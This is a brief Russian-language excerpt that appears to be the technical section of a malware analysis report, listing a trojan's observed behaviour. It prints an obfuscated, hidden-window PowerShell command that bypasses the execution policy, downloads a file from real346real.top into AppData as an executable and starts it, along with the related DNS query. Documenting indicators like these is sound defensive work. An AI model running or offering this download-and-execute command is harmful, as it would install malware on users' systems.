Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowERSHELL.exE -eXEcutIonpOLiCY BypASS -NOproFILe -WInDOwSTyle HiddEn (new-oBJecT sYSteM.net.WebcLient).dOwnLoadFiLe('http://real346real.top/search.php','%APPdAta%.eXE');stART-pRoc...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /C "PowERSHELL.exE -eXEcutIonpOLiCY BypASS -NOproFILe -WInDOwSTyle HiddEn (new-oBJecT sYSteM.net.WebcLient).dOwnLoadFiLe('http://real346real.top/search.php','%APPdAta%.eXE');stART-pRoc...' (со скрытым окном)